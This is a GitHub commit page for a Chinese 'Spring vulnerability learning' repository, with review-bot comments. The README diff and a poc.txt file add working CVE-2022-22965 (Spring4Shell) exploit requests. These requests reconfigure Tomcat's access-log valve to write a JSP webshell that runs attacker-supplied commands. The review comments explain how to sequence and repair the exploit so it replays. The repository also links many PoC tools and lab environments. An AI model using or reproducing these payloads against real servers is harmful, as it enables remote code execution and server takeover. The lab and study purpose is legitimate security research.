
Commit ed378dc

Update
1 parent 96c22bb commit ed378dc

23 files changed, +122 -2 lines changed

README.md

Lines changed: 97 additions & 2 deletions
@@ -1,2 +1,97 @@
1-
# Spring
2-
《Spring漏洞学习》
1+
# HackSpring-永恒之春
2+
3+
本项目用来致敬全宇宙最无敌Spring框架!同时也记录自己在学习Spring漏洞过程中遇到的一些内容。本项目会持续更新,本项目创建于2022年3月30日,最近的一次更新时间为2022年4月1日。作者:[0e0w](https://github.com/0e0w)
4+
5+
- [01-Spring基础知识]()
6+
- [02-Spring框架识别]()
7+
- [03-Spring上层建筑]()
8+
- [04-Spring漏洞汇总]()
9+
- [05-Spring检测利用]()
10+
- [06-Spring漏洞修复]()
11+
- [07-Spring分析文章]()
12+
- [08-Spring靶场环境]()
13+
14+
## 01-Spring基础知识
15+
16+
## 02-Spring框架识别
17+
18+
- 待更新
19+
20+
## 03-Spring上层建筑
21+
22+
**Spring + ? = rce !**
23+
24+
## 04-Spring漏洞汇总
25+
26+
- CVE-2022-22965
27+
28+
## 05-Spring检测利用
29+
30+
如何判断一个网站是否存在Spring漏洞?如何查找内网中存在Sprin漏洞?
31+
32+
一、Payload
33+
34+
```
35+
POST / HTTP/1.1
36+
Host: 127.0.0.1:8090
37+
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
38+
Accept-Encoding: gzip, deflate
39+
Accept: */*
40+
Connection: close
41+
suffix: %>//
42+
c1: Runtime
43+
c2: <%
44+
DNT: 1
45+
Content-Type: application/x-www-form-urlencoded
46+
Content-Length: 761
47+
48+
class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22S%22.equals(request.getParameter(%22Tomcat%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=Shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=
49+
```
50+
51+
二、源码检测
52+
53+
三、漏洞验证
54+
55+
- 测试时发现webshell只能写入一次!第二次失败!
56+
57+
四、漏洞扫描
58+
59+
五、其他工具
60+
61+
- https://github.com/TheGejr/SpringShell
62+
- https://github.com/BobTheShoplifter/Spring4Shell-POC
63+
- https://github.com/kh4sh3i/Spring-CVE
64+
- https://github.com/GuayoyoCyber/CVE-2022-22965
65+
- https://github.com/viniciuspereiras/CVE-2022-22965-poc
66+
- https://github.com/reznok/Spring4Shell-POC
67+
- https://github.com/jschauma/check-springshell
68+
- https://github.com/colincowie/Safer_PoC_CVE-2022-22965
69+
- https://github.com/alt3kx/CVE-2022-22965_PoC
70+
- https://github.com/exploitbin/CVE-2022-22963-Spring-Core-RCE
71+
- https://github.com/light-Life/CVE-2022-22965-GUItools
72+
- https://github.com/Mr-xn/spring-core-rce
73+
- https://github.com/Kirill89/CVE-2022-22965-PoC
74+
- https://github.com/Axx8/SpringFramework_CVE-2022-22965_RCE
75+
- https://github.com/likewhite/CVE-2022-22965
76+
- https://github.com/mebibite/springhound
77+
- https://github.com/irgoncalves/f5-waf-enforce-sig-Spring4Shell
78+
79+
## 06-Spring漏洞修复
80+
81+
## 07-Spring分析文章
82+
83+
- https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html
84+
- https://bugalert.org/content/notices/2022-03-29-spring.html
85+
- https://websecured.io/blog/624411cf775ad17d72274d16/spring4shell-poc
86+
- https://www.springcloud.io/post/2022-03/spring-0day-vulnerability
87+
- https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement
88+
89+
## 08-Spring靶场环境
90+
91+
- https://github.com/jbaines-r7/spring4shell_vulnapp
92+
- https://github.com/Kirill89/CVE-2022-22965-PoC
93+
- https://github.com/DDuarte/springshell-rce-poc
94+
- https://github.com/XuCcc/VulEnv
95+
96+
[![Stargazers over time](https://starchart.cc//HackJava/Spring.svg)](https://starchart.cc/HackJava/Spring)
97+
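Review bot: The tools list under 05-Spring检测利用 links https://github.com/exploitbin/CVE-2022-22963-Spring-Core-RCE, but CVE-2022-22963 is a different vulnerability (Spring Cloud Function SpEL injection) from the CVE-2022-22965 `class.module.classLoader` property traversal that the payload above exploits and that 04-Spring漏洞汇总 lists as its only entry; either add CVE-2022-22963 to section 04 as its own item or drop the link so the two sections agree. Two further points on the payload block: the section opens with "如何判断一个网站是否存在Spring漏洞?" yet the only request shown is a destructive exploit (it reconfigures Tomcat's access-log valve through `pipeline.first.pattern/suffix/directory/prefix` so the next logged request is written as `webapps/ROOT/Shell.jsp`), so a non-destructive probe belongs first and this request should be labelled as exploitation, not detection; and the `module` hop in `class.module.classLoader` only resolves on Java 9 and later, while `webapps/ROOT` assumes a WAR deployed on Tomcat, so both prerequisites should be stated next to the payload. The note under 三、漏洞验证 ("webshell只能写入一次!第二次失败!") is left as a bare observation; it deserves either an explanation or a documented workaround, otherwise readers will report it as a broken PoC. Finally, the eight table-of-contents links at the top all have empty `()` targets, and sections 01, 02 and 06 have no body; either point the links at the `##` anchors or mark the empty sections as placeholders.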

TEMP/Spring-beans_RCE漏洞分析.pdf

2.25 MB

TEMP/WeChat_20220329225214.mp4

2.2 MB

TEMP/poc.txt

Lines changed: 25 additions & 0 deletions
@@ -0,0 +1,25 @@
1+
http://127.0.0.1:8080/stupidRumor_war_exploded/index?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7b%66%75%63%6b%7d%69
2+
http://127.0.0.1:8080/stupidRumor_war_exploded/index?class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp
3+
http://127.0.0.1:8080/stupidRumor_war_exploded/index?class.module.classLoader.resources.context.parent.pipeline.first.directory=%48%3a%5c%6d%79%4a%61%76%61%43%6f%64%65%5c%73%74%75%70%69%64%52%
4+
http://127.0.0.1:8080/stupidRumor_war_exploded/index?class.module.classLoader.resources.context.parent.pipeline.first.prefix=fuckJsp
5+
http://127.0.0.1:8080/stupidRumor_war_exploded/index?class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=
6+
7+
8+
9+
GET /stupidRumor_war_exploded/fuckUUUU HTTP/1.1
10+
Host: 127.0.0.1:8080
11+
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
12+
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
13+
fuck: <%Runtime.getRuntime().exec(request.getParameter("cmd"))%>
14+
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
15+
Accept-Encoding: gzip, deflate
16+
Connection: close
17+
Upgrade-Insecure-Requests: 1
18+
Sec-Fetch-Dest: document
19+
Sec-Fetch-Mode: navigate
20+
Sec-Fetch-Site: none
21+
Sec-Fetch-User: ?1
22+
23+
24+
25+
stupidRumor_war_exploded/fuckJsp.jsp
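Review bot: Line 3's `directory` value is truncated at `%52%` (it decodes to the Windows path `H:\myJavaCode\stupidR` and then stops mid percent-escape), so the five setup requests on lines 1-5 cannot be replayed as written; complete the value or replace it with a relative directory such as the `webapps/ROOT` used in the README payload. The file also gives no ordering: the header on line 13 (`fuck: <%Runtime.getRuntime().exec(request.getParameter("cmd"))%>`) is what the `%{fuck}i` pattern from line 1 copies into the log, so lines 1-5 must be sent before the GET on line 9, and only then does `stupidRumor_war_exploded/fuckJsp.jsp` on line 25 exist to be called with `?cmd=...`; a short comment stating that sequence would make the file usable. Note as well that this JSP only executes the command and discards its output, unlike the README payload, which reads the process's stdout back into the response.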

TEMP/spring-rce-poc-master.zip

16.3 MB

TEMP/微信图片_20220329223814.jpg

943 KB

TEMP/微信图片_20220329223828.jpg

81.5 KB

TEMP/微信图片_20220329223834.jpg

163 KB

TEMP/微信图片_20220329225250.jpg

58.8 KB

TEMP/微信图片_20220329225300.jpg

115 KB
